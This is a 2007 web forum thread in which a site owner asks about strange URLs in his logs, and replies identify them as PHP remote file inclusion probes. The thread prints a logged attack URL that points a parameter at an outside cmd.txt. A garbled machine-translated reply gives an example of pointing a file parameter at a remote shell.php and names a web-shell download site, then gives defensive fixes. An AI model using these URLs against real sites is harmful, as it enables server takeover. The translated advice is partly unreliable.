XSS (Cross Site Scripting) issue

komrad Notable Member

Messages:: 2,539

Likes Received:: 14

Best Answers:: 0

Trophy Points:: 230

#1

Hello,

Some days ago, i checked my site visitor statistic and i was really wonder because there was many strange url found.

Here are some of them:

http://www.mydomain.com/order.php?lang=http://rpgnet.com/newrpgnet/intranet/cmd.txt

Part of url in bold didnt exist in the site.

So, could you give me solution about this problem? What should i do?
Are they dangerous?

I really need your help. Thanks in advance.

komrad, Aug 15, 2007 IP

CodyRo Peon

Messages:: 365

Likes Received:: 15

Best Answers:: 0

Trophy Points:: 0

#2

I suppose this forum makes a bit more sense than the Apache one.

Check my post in the other forum.

Linky

CodyRo, Aug 16, 2007 IP

Webmoney-Vl Peon

Messages:: 35

Likes Received:: 1

Best Answers:: 0

Trophy Points:: 0

#3

It refers to not XSS, it PHP-inj. It is eliminated in the next way:

===========
Include-bug
===========

It is very old and almost all a known bug in scripts, but unfortunately till now very actual. function include () (its(her) analogue: inÑlude_once ()) serves to attach to a PHP-code new modules on PHP. The Most frequent mistake(error) with this functions is the code: include ("$file") , and the variable $file undertakes from parameter to a script (for example, qwe.php? file=index.php). The hacker simply needs to create on the host a PHP-file about a web-shell (http: // www.web-hack.ru/download/info.php? go=77) and to transfer(transmit) in parameter to a script the address of the a web-shell (for example, qwe.php? file=http: // web-hack.ru/shell.php). The truth in this situation can rescue(save) a victim, that in config PHP is forbidden include a file from other servers.
The decision of a problem with an Include-bug is absence of a variable transferred(transmitted) in inquiry to a script, for include. In such cases it is possible to use a design with the operator switch, for example so:

switch ($case) // $case - a name of a variable transferred(transmitted) in parameter to a script
{
case news:
include ("news.php");
break;

case articles:
include ("articles.php");
break;

... //, etc.

default:
include ("index.php"); // if in a variable $case value which is considered above the main page opens will not be transferred(transmitted)
break;
}

Many naive programmers think, that if they will make a design of type include ("$file.php") them cannot break. They deeply are mistaken! First, in old versions PHP (for example, PHP <=4.0.3pl1) was present a bug null-byte (the friend still from Perl), which allowed to reject expansion (and in general, everything after a variable) a file. Secondly, even if version PHP on a server new it is possible include any php-file on it(this) a server (if the rights to its(his) reading will suffice), and too to not eat it well. So remember advice(council): whenever possible NEVER transfer(transmit) variables through parameter to a script, which will participate then in functions include (). I certainly understand, that it is possible to make abrupt filters on this variable but as shows an expert - " Better Safe - the god protects ". All above described as concerns to function: fopen (), require (), require_once () and inÑlude_once ().

As recommending in config PHP to establish(install) register_globals=off (since version 4.2.0 the variable is switched off by default), since if you CMS uses modules and in what that the module is a line include ("$file") , and value of a variable $file is set not in this module, and in the main file the hacker can transfer(transmit) $file through parameter to a file of the module in a browser.
Click to expand...

Webmoney-Vl, Aug 16, 2007 IP

BTS Active Member

Messages:: 184

Likes Received:: 6

Best Answers:: 0

Trophy Points:: 58

#4

this is a remote file include
if you use a script tell to his owner to cancel the bug
like
}else{
echo " sorry , not found " ;

BTS, Aug 21, 2007 IP

Log in or Sign up

XSS (Cross Site Scripting) issue

komrad Notable Member

CodyRo Peon

Webmoney-Vl Peon

BTS Active Member

Useful Searches